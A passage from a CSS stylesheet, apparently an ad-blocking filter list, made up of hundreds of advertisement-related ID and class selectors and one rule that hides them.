vertical,#small_ads,#smallerAd,#some-ads,#some-more-ads,#specialAd_one,#specialAd_two,#specialadvertisingreport_container,#specials_ads,#speeds_ads,#speeds_ads_fstitem,#speedtest_mrec_ad,#sphereAd,#spnAds,#sponlink,#sponlinks,#sponsAds,#sponsLinks,#sponseredlinks,#sponsorAd1,#sponsorAd2,#sponsorAdDiv,#sponsorLinks,#sponsorTextLink,#sponsor_banderole,#sponsor_deals,#sponsored,#sponsored-ads,#sponsored-features,#sponsored-links,#sponsored-listings,#sponsored-resources,#sponsored1,#sponsoredBox1,#sponsoredBox2,#sponsoredLinks,#sponsoredLinks_Top,#sponsoredList,#sponsoredResults,#sponsoredResultsWide,#sponsoredSiteMainline,#sponsoredSiteSidebar,#sponsored_ads_v4,#sponsored_container,#sponsored_content,#sponsored_game_row_listing,#sponsored_head,#sponsored_link,#sponsored_link_bottom,#sponsored_links,#sponsored_v12,#sponsoredads,#sponsoredlinks,#sponsoredlinks_cntr,#sponsoredlinkslabel,#sponsoredresults_top,#sponsoredwellcontainerbottom,#sponsoredwellcontainertop,#sponsorlink,#spotlightAds,#spotlightad,#sqAd,#squareAd,#squareAdSpace,#squareAds,#square_ad,#srp_adsense-top,#start_middle_container_advertisment,#sticky-ad,#stickyBottomAd,#story-90-728-area,#story-ad-a,#story-ad-b,#story-leaderboard-ad,#story-sponsoredlinks,#storyAd,#storyAdWrap,#storyad2,#submenu-ads,#subpage-ad-right,#subpage-ad-top,#swads,#synch-ad,#systemad_background,#tabAdvertising,#takeoverad,#tblAd,#tbl_googlead,#tcwAd,#td-GblHdrAds,#template_ad_leaderboard,#tertiary_advertising,#test_adunit_160_article,#text-ad,#text-ads,#text-link-ads,#textAd,#textAds,#text_ad,#text_ads,#text_advert,#textad,#textad3,#textad_block,#the-last-ad-standing,#thefooterad,#themis-ads,#tile-ad,#tmglBannerAd,#tmp2_promo_ad,#toolbarSlideUpAd,#top-ad,#top-ad-container,#top-ad-menu,#top-ads,#top-ads-tabs,#top-advertisement,#top-banner-ad,#top-search-ad-wrapper,#topAd,#topAd728x90,#topAdBanner,#topAdBox,#topAdContainer,#topAdSenseDiv,#topAdcontainer,#topAds,#topAdsContainer,#topAdvBox,#topAdvert,#topAdvert-09,#topBannerAd,#topBannerAdContainer,#topContentAdTeaser,#topNavLeaderboardAdHolder,#topOverallAdArea,#topRightBlockAdSense,#topSponsoredLinks,#top_ad,#top_ad-sense,#top_ad_area,#top_ad_banner,#top_ad_game,#top_ad_unit,#top_ad_wrapper,#top_ad_zone,#top_ads,#top_ads_wrap,#top_advertise,#top_advertising,#top_rectangle_ad,#top_right_ad,#top_wide_ad,#topad,#topad1,#topad2,#topad_left,#topad_right,#topadbar,#topadblock,#topaddwide,#topads,#topadsense,#topadspace,#topadwrap,#topadzone,#topbanner_ad,#topbannerad,#topbar-ad,#topcustomad,#topleaderboardad,#topnav-ad-shell,#topnavad,#toprightAdvert,#toprightad,#topsponsored,#toptextad,#tour300Ad,#tour728Ad,#tourSponsoredLinksContainer,#towerad,#ts-ad_module,#ttp_ad_slot1,#ttp_ad_slot2,#twogamesAd,#txfPageMediaAdvertVideo,#txt_link_ads,#txtads,#undergameAd,#upper-ads,#upperAdvertisementImg,#upperMpu,#upper_small_ad,#upperad,#urban_contentad_1,#urban_contentad_2,#urban_contentad_article,#v_ad,#vap_adsense-top,#vert-ads,#vert_ad,#vert_ad_placeholder,#vertical_ad,#vertical_ads,#videoAd,#videoAdvert,#video_ads_overdiv,#video_advert2,#video_advert3,#video_cnv_ad,#video_overlay_ad,#videoadlogo,#view_ads,#view_ads_advertisements,#viewads,#viewportAds,#viewvid_ad300x250,#wXcds12-ad,#wall_advert,#wallpaper-ad-link,#wallpaperAd_left,#wallpaperAd_right,#walltopad,#weblink_ads_container,#welcomeAdsContainer,#welcome_ad_mrec,#welcome_advertisement,#wf_ContentAd,#wf_FrontSingleAd,#wf_SingleAd,#wf_bottomContentAd,#wgtAd,#whatsnews_top_ad,#whitepaper-ad,#whoisRightAdContainer,#wide_ad_unit_top,#wideskyscraper_160x600_left,#wideskyscraper_160x600_right,#widget_Adverts,#widget_advertisement,#widgetwidget_adserve2,#wrapAdRight,#wrapAdTop,#wrapperAdsTopLeft,#wrapperAdsTopRight,#xColAds,#y-ad-units,#y708-ad-expedia,#y708-ad-lrec,#y708-ad-partners,#y708-ad-ysm,#y708-advertorial-marketplace,#yahoo-ads,#yahoo-sponsors,#yahooSponsored,#yahoo_ads,#yahoo_ads_2010,#yahoo_text_ad,#yahooad-tbl,#yan-sponsored,#yatadsky,#ybf-ads,#yfi_fp_ad_mort,#yfi_fp_ad_nns,#yfi_pf_ad_mort,#ygrp-sponsored-links,#ymap_adbanner,#yn-gmy-ad-lrec,#yreSponsoredLinks,#ysm_ad_iframe,#zoneAdserverMrec,#zoneAdserverSuper,.ADBAR,.ADPod,.AD_ALBUM_ITEMLIST,.AD_MOVIE_ITEM,.AD_MOVIE_ITEMLIST,.AD_MOVIE_ITEMROW,.ADbox,.Ad-300x100,.Ad-Container-976x166,.Ad-Header,.Ad-MPU,.Ad-Wrapper-300x100,.Ad120x600,.Ad160x600,.Ad160x600left,.Ad160x600right,.Ad247x90,.Ad300x,.Ad300x250,.Ad300x250L,.Ad728x90,.AdBorder,.AdBox,.AdBox7,.AdContainerBox308,.AdContainerModule,.AdHeader,.AdHere,.AdInfo,.AdInline,.AdMedium,.AdPlaceHolder,.AdProS728x90Container,.AdProduct,.AdRingtone,.AdSense,.AdSenseLeft,.AdSlot,.AdSpace,.AdTextSmallFont,.AdTitle,.AdUnit,.AdUnit300,.Ad_C,.Ad_D_Wrapper,.Ad_E_Wrapper,.Ad_Right,.AdsBottom,.AdsBoxBottom,.AdsBoxSection,.AdsBoxTop,.AdsLinks1,.AdsLinks2,.AdsRec,.AdvBoxSidebar,.Advert,.Advert300x250,.AdvertMidPage,.AdvertiseWithUs,.Advertisement,.AdvertisementTextTag,.Advman_Widget,.ArticleAd,.ArticleInlineAd,.BCA_Advertisement,.Banner300x250,.BannerAd,.BigBoxAd,.BlockAd,.BlueTxtAdvert,.BottomAdContainer,.BottomAffiliate,.BoxAd,.CG_adkit_leaderboard,.CG_details_ad_dropzone,.CWReviewsProdInfoAd,.ComAread,.CommentAd,.ContentAd,.ContentAds,.DAWRadvertisement,.DeptAd,.DisplayAd,.FT_Ad,.FeaturedAdIndexAd,.FlatAds,.FooterAds,.GOOGLE_AD,.GoogleAd,.GoogleAdSenseBottomModule,.GoogleAdSenseRightModule,.HPG_Ad_B,.HPNewAdsBannerDiv,.HPRoundedAd,.HeaderAds,.HomeContentAd,.IABAdSpace,.InArticleAd,.IndexRightAd,.LazyLoadAd,.LeftAd,.LeftButtonAdSlot,.LeftTowerAd,.M2Advertisement,.MD_adZone,.MOS-ad-hack,.MPUHolder,.MPUTitleWrapperClass,.MREC_ads,.MiddleAd,.MiddleAdContainer,.MiddleAdvert,.NewsAds,.OpaqueAdBanner,.OpenXad,.PU_DoubleClickAdsContent,.Post5ad,.Post8ad,.Post9ad,.RBboxAd,.RW_ad300,.RectangleAd,.RelatedAds,.Right300x250AD,.RightAd1,.RightAdvertiseArea,.RightAdvertisement,.RightGoogleAFC,.RightRailAd,.RightRailTop300x250Ad,.RightSponsoredAdTitle,.RightTowerAd,.STR_AdBlock,.SectionSponsor,.SideAdCol,.SidebarAd,.SidebarAdvert,.SitesGoogleAdsModule,.SkyAdContainer,.SponsoredAdTitle,.SponsoredContent,.SponsoredLinkItemTD,.SponsoredLinks,.SponsoredLinksGrayBox,.SponsoredLinksModule,.SponsoredLinksPadding,.SponsoredLinksPanel,.Sponsored_link,.SquareAd,.StandardAdLeft,.StandardAdRight,.TRU-onsite-ads-leaderboard,.TextAd,.TheEagleGoogleAdSense300x250,.TopAd,.TopAdContainer,.TopAdL,.TopAdR,.TopBannerAd,.UIWashFrame_SidebarAds,.UnderAd,.VerticalAd,.Video-Ad,.VideoAd,.WidgetAdvertiser,.a160x600,.a728x90,.ad-120x60,.ad-120x600,.ad-160,.ad-160x600,.ad-160x600x1,.ad-160x600x2,.ad-160x600x3,.ad-250,.ad-300,.ad-300-block,.ad-300-blog,.ad-300x100,.ad-300x250,.ad-300x250-first,.ad-300x250-right0,.ad-300x600,.ad-350,.ad-355x75,.ad-600,.ad-635x40,.ad-728,.ad-728x90,.ad-728x90-1,.ad-728x90-top0,.ad-728x90_forum,.ad-90x600,.ad-above-header,.ad-adlink-bottom,.ad-adlink-side,.ad-area,.ad-background,.ad-banner,.ad-banner-smaller,.ad-bigsize,.ad-block,.ad-block-square,.ad-blog2biz,.ad-body,.ad-bottom,.ad-box,.ad-break,.ad-btn,.ad-btn-heading,.ad-button,.ad-cell,.ad-column,.ad-container,.ad-container-300x250,.ad-container-728x90,.ad-container-994x282,.ad-context,.ad-disclaimer,.ad-display,.ad-div,.ad-enabled,.ad-feedback,.ad-filler,.ad-flex,.ad-footer,.ad-footer-leaderboard,.ad-forum,.ad-google,.ad-graphic-large,.ad-gray,.ad-grey,.ad-hdr,.ad-head,.ad-header,.ad-heading,.ad-holder,.ad-homeleaderboard,.ad-img,.ad-in-post,.ad-index-main,.ad-inline,.ad-island,.ad-item,.ad-label,.ad-leaderboard,.ad-left,.ad-link,.ad-links,.ad-lrec,.ad-medium,.ad-medium-two,.ad-mpl,.ad-mpu,.ad-msn,.ad-note,.ad-notice,.ad-other,.ad-permalink,.ad-place-active,.ad-placeholder,.ad-postText,.ad-poster,.ad-priority,.ad-rect,.ad-rectangle,.ad-rectangle-text,.ad-related,.ad-rh,.ad-ri,.ad-right,.ad-right-header,.ad-right-txt,.ad-row,.ad-section,.ad-show-label,.ad-side,.ad-sidebar,.ad-sidebar-outer,.ad-sidebar300,.ad-sky,.ad-skyscr,.ad-skyscraper,.ad-slot,.ad-slot-234-60,.ad-slot-300-250,.ad-slot-728-90,.ad-source,.ad-space,.ad-space-mpu-box,.ad-space-topbanner,.ad-spot,.ad-square,.ad-square300,.ad-squares,.ad-statement,.ad-story-inject,.ad-tabs,.ad-text,.ad-text-links,.ad-tile,.ad-title,.ad-top,.ad-top-left,.ad-unit,.ad-unit-300,.ad-unit-300-wrapper,.ad-unit-anchor,.ad-unit-top,.ad-vert,.ad-vertical-container,.ad-vtu,.ad-widget-list,.ad-with-us,.ad-wrap,.ad-wrapper,.ad-zone,.ad-zone-s-q-l,.ad.super,.ad08sky,.ad100,.ad120,.ad120x240backgroundGray,.ad120x600,.ad125,.ad140,.ad160,.ad160600,.ad160x600,.ad160x600GrayBorder,.ad200x60,.ad230,.ad250,.ad250c,.ad300,.ad300250,.ad300_250,.ad300x100,.ad300x250,.ad300x250-hp-features,.ad300x250Module,.ad300x250Top,.ad300x250_container,.ad300x250box,.ad300x50-right,.ad300x600,.ad310,.ad315,.ad336x280,.ad343x290,.ad400right,.ad450,.ad468,.ad468_60,.ad468x60,.ad540x90,.ad600,.ad620x70,.ad626X35,.ad644,.ad728,.ad728_90,.ad728x90,.ad728x90_container,.ad90x780,.adAgate,.adArea674x60,.adBanner,.adBanner300x250,.adBanner728x90,.adBannerTyp1,.adBannerTypSortableList,.adBannerTypW300,.adBar,.adBgBottom,.adBgMId,.adBgTop,.adBlock,.adBottomLink,.adBottomboxright,.adBox,.adBox1,.adBox230X96,.adBox728X90,.adBoxBody,.adBoxBorder,.adBoxContainer,.adBoxContent,.adBoxInBignews,.adBoxSidebar,.adBoxSingle,.adBwrap,.adCMRight,.adCell,.adColumn,.adCont,.adContTop,.adContainer,.adContentAd,.adContour,.adCreative,.adCube,.adDiv,.adElement,.adFender3,.adFrame,.adFtr,.adFullWidthMiddle,.adGoogle,.adHeader,.adHeadline,.adHolder,.adHome300x250,.adHorisontal,.adInNews,.adIsland,.adLabel,.adLeader,.adLeaderForum,.adLeaderboard,.adLeft,.adLoaded,.adLocal,.adMPU,.adMarker,.adMastheadLeft,.adMastheadRight,.adMegaBoard,.adMinisLR,.adMkt2Colw,.adModule,.adModuleAd,.adMpu,.adNewsChannel,.adNoOutline,.adNotice,.adNoticeOut,.adObj,.adPageBorderL,.adPageBorderR,.adPanel,.adPod,.adRect,.adResult,.adRight,.adSKY,.adSelfServiceAdvertiseLink,.adServer,.adSky,.adSky600,.adSkyscaper,.adSkyscraperHolder,.adSlot,.adSpBelow,.adSpace,.adSpacer,.adSplash,.adSponsor,.adSpot,.adSpot-brought,.adSpot-searchAd,.adSpot-textBox,.adSpot-twin,.adSpotIsland,.adSquare,.adSubColPod,.adSummary,.adSuperboard,.adSupertower,.adTD,.adTab,.adTag,.adText,.adTileWrap,.adTiler,.adTitle,.adTopLink,.adTopboxright,.adTout,.adTxt,.adUnit,.adUnitHorz,.adUnitVert,.adUnitVert_noImage,.adWebBoard,.adWidget,.adWithTab,.adWord,.adWrap,.adWrapper,.ad_0,.ad_1,.ad_120x90,.ad_125,.ad_130x90,.ad_160,.ad_160x600,.ad_2,.ad_200,.ad_200x200,.ad_250x250,.ad_250x250_w,.ad_3,.ad_300,.ad_300_250,.ad_300x250,.ad_300x250_box_right,.ad_336,.ad_336x280,.ad_350x100,.ad_350x250,.ad_400x200,.ad_468,.ad_468x60,.ad_600,.ad_680x15,.ad_728,.ad_728_90b,.ad_728x90,.ad_925x90,.ad_Left,.ad_Right,.ad_ad_300,.ad_amazon,.ad_banner,.ad_banner_border,.ad_bar,.ad_bg,.ad_bigbox,.ad_biz,.ad_block,.ad_block_338,.ad_body,.ad_border,.ad_botbanner,.ad_bottom,.ad_bottom_leaderboard,.ad_bottom_left,.ad_box,.ad_box2,.ad_box_ad,.ad_box_div,.ad_callout,.ad_caption,.ad_column,.ad_column_box,.ad_column_hl,.ad_contain,.ad_container,.ad_content,.ad_content_wide,.ad_contents,.ad_descriptor,.ad_disclaimer,.ad_eyebrow,.ad_footer,.ad_frame,.ad_framed,.ad_front_promo,.ad_gutter_top,.ad_head,.ad_header,.ad_heading,.ad_headline,.ad_holder,.ad_hpm,.ad_image,.ad_info_block,.ad_inline,.ad_island,.ad_jnaught,.ad_label,.ad_launchpad,.ad_leader,.ad_leaderboard,.ad_left,.ad_line,.ad_link,.ad_links,.ad_linkunit,.ad_loc,.ad_lrec,.ad_main,.ad_medrec,.ad_medrect,.ad_middle,.ad_mod,.ad_mp,.ad_mpu,.ad_mr,.ad_mrec,.ad_mrec_title_article,.ad_mrect,.ad_news,.ad_note,.ad_notice,.ad_one,.ad_p360,.ad_partner,.ad_partners,.ad_plus,.ad_post,.ad_power,.ad_primary,.ad_promo,.ad_rec,.ad_rectangle,.ad_right,.ad_right_col,.ad_row,.ad_row_bottom_item,.ad_side,.ad_sidebar,.ad_skyscraper,.ad_slug,.ad_slug_table,.ad_space,.ad_space_300_250,.ad_spacer,.ad_sponsor { display:none !important; } .ad_sponsoredsection,.ad_spot_b,.ad_spot_c,.ad_square_r,.ad_square_top,.ad_sub,.ad_tag_middle,.ad_text,.ad_text_w,.ad_title,.ad_top,.ad_top_leaderboard,.ad_top_left,.ad_topright,.ad_tower,.ad_unit,.ad_unit_rail,.ad_url,.ad_warning,.ad_wid300,.ad_wide,.ad_wrap,.ad_wrapper,.ad_wrapper_fixed,.ad_wrapper_top,.ad_wrp,.ad_zone,.adarea,.adarea-long,.adbanner,.adbannerbox,.adbannerright,.adbar,.adboard,.adborder,.adbot,.adbottom,.adbottomright,.adbox-outer,.adbox-wrapper,.adbox_300x600,.adbox_366x280,.adbox_468X60,.adbox_bottom,.adbox_br,.adbox_left,.adboxclass,.adboxesrow,.adbreak,.adbug,.adbutton,.adbuttons,.adcode,.adcol1,.adcol2,.adcolumn,.adcolumn_wrapper,.adcont,.adcopy,.add_300x250,.addiv,.adenquire,.adfieldbg,.adfoot,.adfootbox,.adframe,.adhead,.adhead_h,.adhead_h_wide,.adheader,.adheader100,.adheader416,.adhi,.adhint,.adholder,.adhoriz,.adiframe,.adinfo,.adinside,.adintro,.adits,.adjlink,.adkicker,.adkit,.adkit-advert,.adkit-lb-footer,.adlabel-horz,.adlabel-vert,.adlabelleft,.adlayer,.adleader,.adleaderboard,.adleft1,.adline,.adlink,.adlinks,.adlist,.adlnklst,.admarker,.admediumred,.admedrec,.admessage,.admodule,.admpu,.admpu-small,.adnation-banner,.adnotice,.adops,.adp-AdPrefix,.adpadding,.adpane,.adpic,.adprice,.adproxy,.adrec,.adright,.adroot,.adrotate_widget,.adrow,.adrow-post,.adrow1box1,.adrow1box3,.adrow1box4,.adrule,.ads-125,.ads-300,.ads-300x250,.ads-728x90-wrap,.ads-ads-top,.ads-banner,.ads-below-content,.ads-categories-bsa,.ads-custom,.ads-favicon,.ads-item,.ads-links-general,.ads-mpu,.ads-outer,.ads-profile,.ads-right,.ads-section,.ads-sidebar,.ads-sky,.ads-small,.ads-sponsors,.ads-stripe,.ads-text,.ads-top,.ads-wide,.ads-widget,.ads-widget-partner-gallery,.ads03,.ads160,.ads1_250,.ads24Block,.ads300,.ads460,.ads460_home,.ads468,.ads728,.ads728x90,.adsArea,.adsBelowHeadingNormal,.adsBlock,.adsBottom,.adsBox,.adsCell,.adsCont,.adsDiv,.adsFull,.adsImages,.adsInsideResults_v3,.adsMPU,.adsMiddle,.adsRight,.adsRow,.adsTextHouse,.adsTop,.adsTower2,.adsTowerWrap,.adsWithUs,.ads_125_square,.ads_180,.ads_300,.ads_300x100,.ads_300x250,.ads_320,.ads_337x280,.ads_728x90,.ads_big,.ads_big-half,.ads_box,.ads_box_headline,.ads_brace,.ads_catDiv,.ads_container,.ads_disc_anchor,.ads_disc_leader,.ads_disc_lwr_square,.ads_disc_skyscraper,.ads_disc_square,.ads_div,.ads_footer,.ads_header,.ads_holder,.ads_horizontal,.ads_leaderboard,.ads_lr_wrapper,.ads_medrect,.ads_mpu,.ads_outer,.ads_post_end,.ads_post_end_code,.ads_post_start,.ads_post_start_code,.ads_rectangle,.ads_remove,.ads_right,.ads_rightbar_top,.ads_sc_bl_i,.ads_sc_tb,.ads_sc_tl_i,.ads_show_if,.ads_side,.ads_sidebar,.ads_singlepost,.ads_spacer,.ads_takeover,.ads_title,.ads_top,.ads_top_promo,.ads_tr,.ads_verticalSpace,.ads_vtlLink,.ads_widesky,.ads_wrapperads_top,.adsafp,.adsbg300,.adsblockvert,.adsborder,.adsbottom,.adsbox,.adsboxitem,.adsbttmpg,.adsbyyahoo,.adscaleAdvert,.adscaleP6_canvas,.adsclick,.adscontainer,.adscreen,.adsd_shift100,.adsection_a2,.adsection_c2,.adsense-468,.adsense-ad,.adsense-category,.adsense-category-bottom,.adsense-googleAds,.adsense-heading,.adsense-overlay,.adsense-post,.adsense-right,.adsense-title,.adsense3,.adsense300,.adsenseAds,.adsenseBlock,.adsenseContainer,.adsenseGreenBox,.adsenseInPost,.adsenseList,.adsense_bdc_v2,.adsense_mpu,.adsensebig,.adsenseblock,.adsenseblock_bottom,.adsenseblock_top,.adsenselr,.adsensem_widget,.adsensesq,.adsenvelope,.adserver_zone,.adset,.adsforums,.adsghori,.adsgvert,.adshome,.adside,.adsidebox,.adsider,.adsingle,.adsleft,.adsleftblock,.adslink,.adslogan,.adslotleft,.adslotright,.adsmalltext,.adsmessage,.adsnippet_widget,.adspace,.adspace-MR,.adspace-widget,.adspace180,.adspace_bottom,.adspace_buysell,.adspace_rotate,.adspace_skyscraper,.adspacer,.adspot,.adspot728x90,.adstext,.adstextpad,.adstitle,.adstop,.adstory,.adstrip,.adtab,.adtable,.adtag,.adtech,.adtext,.adtext_gray,.adtext_horizontal,.adtext_onwhite,.adtext_vertical,.adtile,.adtips,.adtips1,.adtitle,.adtop,.adtravel,.adtxt,.adtxtlinks,.adunit,.adv-mpu,.adv-p,.adv-sidebar,.adv300,.advBox,.advSquare,.advVideobox,.adv_120x600,.adv_300x250,.adv_728x90,.adv_banner_hor,.adv_medium_rectangle,.adver,.adverTag,.adverTxt,.adver_cont_below,.advert-300-side,.advert-300x100-side,.advert-728x90,.advert-article-bottom,.advert-bannerad,.advert-bg-250,.advert-bloggrey,.advert-box,.advert-btm,.advert-head,.advert-horizontal,.advert-iab-300-250,.advert-iab-468-60,.advert-mpu,.advert-skyscraper,.advert-text,.advert-title,.advert-txt,.advert120,.advert300,.advert300x250,.advert300x300,.advert300x440,.advert350ih,.advert4,.advert5,.advert728x90,.advert8,.advertColumn,.advertCont,.advertContainer,.advertContent,.advertHeadline,.advertIslandWrapper,.advertRight,.advertSuperBanner,.advertText,.advertTitleSky,.advert_336,.advert_468x60,.advert_box,.advert_cont,.advert_container,.advert_djad,.advert_google_content,.advert_google_title,.advert_home_300,.advert_label,.advert_leaderboard,.advert_list,.advert_note,.advert_surr,.advert_top,.advertheader-red,.advertise,.advertise-here,.advertise-homestrip,.advertise-horz,.advertise-inquiry,.advertise-leaderboard,.advertise-list,.advertise-top,.advertise-vert,.advertiseContainer,.advertiseText,.advertise_ads,.advertise_here,.advertise_link,.advertise_link_sidebar,.advertisement,.advertisement-728x90,.advertisement-block,.advertisement-sidebar,.advertisement-space,.advertisement-sponsor,.advertisement-swimlane,.advertisement-text,.advertisement-top,.advertisement300x250,.advertisement468,.advertisementBox,.advertisementColumnGroup,.advertisementContainer,.advertisementHeader,.advertisementLabel,.advertisementPanel,.advertisementText,.advertisement_300x250,.advertisement_btm,.advertisement_caption,.advertisement_g,.advertisement_header,.advertisement_horizontal,.advertisement_top,.advertisementsOutterDiv,.advertiser,.advertiser-links,.advertisespace_div,.advertising-banner,.advertising-header,.advertising-leaderboard,.advertising-local-links,.advertising2,.advertisingTable,.advertising_block,.advertising_images,.advertisment,.advertisment_bar,.advertisment_caption,.advertisment_two,.advertize,.advertize_here,.advertorial,.advertorial-2,.advertorial-promo-box,.advertorial_red,.advertorialtitle,.adverts,.adverts-125,.adverts_RHS,.advt,.advt-banner-3,.advt-block,.advt-sec,.advt300,.advt720,.advtitle,.adwhitespace,.adwordListings,.adwords,.adwordsHeader,.adwrap,.adwrapper-lrec,.adwrapper948,.adzone-footer,.adzone-sidebar,.affiliate-link,.affiliate-sidebar,.affiliateAdvertText,.affiliates-sidebar,.affinityAdHeader,.afsAdvertising,.after_ad,.agi-adsaleslinks,.alb-content-ad,.alignads,.alt_ad,.anchorAd,.another_text_ad,.answer_ad_content,.aolSponsoredLinks,.aopsadvert,.apiAdMarkerAbove,.apiAds,.app_advertising_skyscraper,.archive-ads,.art_ads,.article-ad-box,.article-ads,.article-content-adwrap,.articleAd,.articleAd300x250,.articleAds,.articleAdsL,.articleEmbeddedAdBox,.article_ad,.article_adbox,.article_mpu_box,.article_page_ads_bottom,.articleads,.aseadn,.aux-ad-widget-1,.aux-ad-widget-2,.b-astro-sponsored-links_horizontal,.b-astro-sponsored-links_vertical,.b_ads_cont,.b_ads_top,.banmanad,.banner-468-60,.banner-468x60,.banner-ad,.banner-ads,.banner-adv,.banner-advert,.banner-adverts,.banner-buysellads,.banner160x600,.banner300by250,.banner300x100,.banner300x250,.banner468,.banner468by60,.banner728x90,.bannerADV,.bannerAd,.bannerAdWrapper300x250,.bannerAdWrapper730x86,.bannerAds,.bannerAdvert,.bannerRightAd,.banner_160x600,.banner_300x250,.banner_728x90,.banner_ad,.banner_ad_footer,.banner_ad_leaderboard,.bannerad,.bannerad-125tower,.bannerad-468x60,.barkerAd,.base-ad-mpu,.base_ad,.base_printer_widgets_AdBreak,.bg-ad-link,.bgnavad,.big-ads,.bigAd,.big_ad,.big_ads,.bigad,.bigad2,.bigbox_ad,.bigboxad,.billboard300x250,.billboard_ad,.biz-ad,.biz-ads,.biz-adtext,.blk_advert,.block-ad,.block-ad300,.block-admanager,.block-ads-bottom,.block-ads-top,.block-adsense,.block-adsense-managed,.block-adspace-full,.block-bg-advertisement-region-1,.block-deca_advertising,.block-google-admanager,.block-google_admanager,.block-openads,.block-openadstream,.block-openx,.block-thirdage-ads,.block-wtg_adtech,.blockAd,.blockAds,.block_ad,.block_ad_floating_bar,.block_ad_sb_text,.block_ad_sb_text2,.block_ad_sponsored_links,.block_ad_sponsored_links-wrapper,.block_ad_sponsored_links_localized,.blockad,.blocked-ads,.blog-ad-leader-inner,.blog-ads-container,.blogAd,.blogAdvertisement,.blogArtAd,.blogBigAd,.blog_ad,.blogads,.blox3featuredAd,.bn_textads,.body_ad,.body_sponsoredresults_bottom,.body_sponsoredresults_middle,.body_sponsoredresults_top,.bodyads,.bodyads2,.bookseller-header-advt,.bottom-ad,.bottom-ad-fr,.bottom-ads,.bottomAd,.bottomAds,.bottom_ad,.bottom_ad_block,.bottom_ads,.bottom_adsense,.bottom_right_ad,.bottomad,.bottomads,.bottomadvert,.bottombarad,.bottomrightrailAd,.bottomvidad,.box-ad,.box-ad-grey,.box-ads,.box-ads-small,.box-adsense,.box-adverts,.boxAd,.boxAds,.boxAdsInclude,.box_ad,.box_ad_container,.box_ad_content,.box_ad_spacer,.box_ad_wrap,.box_ads,.box_adv,.box_adv_new,.box_advertising,.box_advertisment_62_border,.box_content_ad,.box_content_ads,.box_textads,.boxad,.boxads,.boxyads,.bps-ad-wrapper,.bps-advertisement,.bps-advertisement-inline-ads,.br-ad,.breakad_container,.brokerad,.bsa_ads,.btm_ad,.btm_ad_container,.btn-ad,.bullet-sponsored-links,.bullet-sponsored-links-gray,.burstContentAdIndex,.busrep_poll_and_ad_container,.buttonAd,.buttonAds,.button_ads,.button_advert,.buttonadbox,.buttonads,.bx_ad,.bx_ad_right,.cA-adStrap,.cColumn-TextAdsBox,.cLeftTextAdUnit,.c_ligatus_nxn,.calendarAd,.calloutAd,.carbonad,.carbonad-tag,.care2_adspace,.catalog_ads,.category-ad,.categorySponsorAd,.category__big_game_container_body_games_advertising,.cb-ad-banner,.cb-ad-container,.cb_ads,.cb_navigation_ad,.cbstv_ad_label,.cbzadvert,.cbzadvert_block,.cdAdTitle,.cdmainlineSearchAdParent,.cdo-ad-section,.cdsidebarSearchAdParent,.centerAd,.center_ad,.centerad,.centered-ad,.chitikaAdCopy,.cinemabotad,.classifiedAdThree,.clearerad,.cmAdContainer,.cmAdFind,.cmAdSponsoredLinksBox,.cm_ads,.cms-Advert,.cnbc_badge_banner_ad_area,.cnbc_banner_ad_area,.cnbc_leaderboard_ad,.cnn160AdFooter,.cnnAd,.cnnMosaic160Container,.cnnStoreAd,.cnnStoryElementBoxAd,.cnnWCAdBox,.cnnWireAdLtgBox,.cnn_728adbin,.cnn_adcntr300x100,.cnn_adcntr728x90,.cnn_adspc336cntr,.cnn_adtitle,.cntrad,.column2-ad,.columnBoxAd,.columnRightAdvert,.com-ad-server,.comment-ad,.comment-ad-wrap,.comment-advertisement,.comment_ad_box,.common_advertisement_title,.communityAd,.conTSponsored,.conductor_ad,.confirm_ad_left,.confirm_ad_right,.confirm_leader_ad,.consoleAd,.container-adwords,.containerSqAd,.container_serendipity_plugin_google_adsense,.content-ad,.content-ads,.content-advert,.contentAd,.contentAdContainer,.contentAdFoot,.contentAdsWrapper,.content_ad,.content_ad_728,.content_adsense,.content_adsq,.content_tagsAdTech,.contentad,.contentad-home,.contentad300x250,.contentad_right_col,.contentadcontainer,.contentadfloatl,.contentadleft,.contentads,.contentadstartpage,.contents-ads-bottom-left,.contenttextad,.contest_ad,.cp_ad,.cpmstarHeadline,.cpmstarText,.create_ad,.cs-mpu,.cscTextAd,.cse_ads,.cspAd,.ct_ad,.ctnAdSkyscraper,.ctnAdSquare300,.cube-ad,.cubeAd,.cube_ads,.currency_ad,.custom_ads,.cwAdvert,.cxAdvertisement,.darla_ad,.dart-ad,.dartAdImage,.dart_ad,.dart_tag,.dartadvert,.dartiframe,.dc-ad,.dcAdvertHeader,.deckAd,.deckads,.detail-ads,.detailMpu,.detail_ad,.detail_top_advert,.dfrads,.displayAdSlot,.divAd,.divAdright,.div_adv300,.div_advstrip,.divad1,.divad2,.divad3,.divads,.divider_ad,.dlSponsoredLinks,.dmco_advert_iabrighttitle,.downloadAds,.download_ad,.downloadad,.dsq_ad,.dualAds,.dynamic-ads,.dynamic_ad,.e-ad,.ec-ads,.ec-ads-remove-if-empty,.em-ad,.em_ads_box_dynamic_remove,.embed-ad,.embeddedAd,.entry-body-ad,.entry-injected-ad,.entry_sidebar_ads,.entryad,.ez-clientAd,.f_Ads,.feature_ad,.featuredAds,.featured_ad,.featuredadvertising,.fireplaceadleft,.fireplaceadright,.fireplaceadtop,.firstpost_advert_container,.flagads,.flash-advertisement,.flash_ad,.flash_advert,.flashad,.flexiad,.flipbook_v2_sponsor_ad,.floatad,.floated_right_ad,.floatingAds,.fm-badge-ad,.fns_td_wrap,.fold-ads,.footad,.footer-ad,.footer-advert,.footerAd,.footerAdModule,.footerAds,.footerAdslot,.footerAdverts,.footerTextAd,.footer_ad,.footer_ad336,.footer_ads,.footer_block_ad,.footer_bottomad,.footer_line_ad,.footer_text_ad,.footerad,.forumtopad,.freedownload_ads,.frn_adbox,.frn_cont_adbox,.frontads,.frontpage-google-ad,.ft-ad,.ftdAdBar,.ftdContentAd,.full_ad_box,.full_width_ad,.fullbannerad,.g3rtn-ad-site,.gAdRows,.gAdSky,.gAdvertising,.g_ggl_ad,.ga-ads,.ga-textads-bottom,.ga-textads-top,.gaTeaserAds,.gaTeaserAdsBox,.gads_cb,.gads_container,.gallery_ad,.gam_ad_slot,.gameAd,.gamesPage_ad_content,.gbl_advertisement,.gen_side_ad,.gglAds,.global_banner_ad,.googad,.googads,.google-ad,.google-ad-container,.google-ads,.google-ads-boxout,.google-ads-slim,.google-adsense,.google-right-ad,.google-sponsored-ads,.google-sponsored-link,.google468,.google468_60,.googleAd,.googleAd-content,.googleAd-list,.googleAd300x250_wrapper,.googleAdBox,.googleAdSense,.googleAdSenseModule,.googleAd_body,.googleAds,.googleAds_article_page_above_comments,.googleAdsense,.g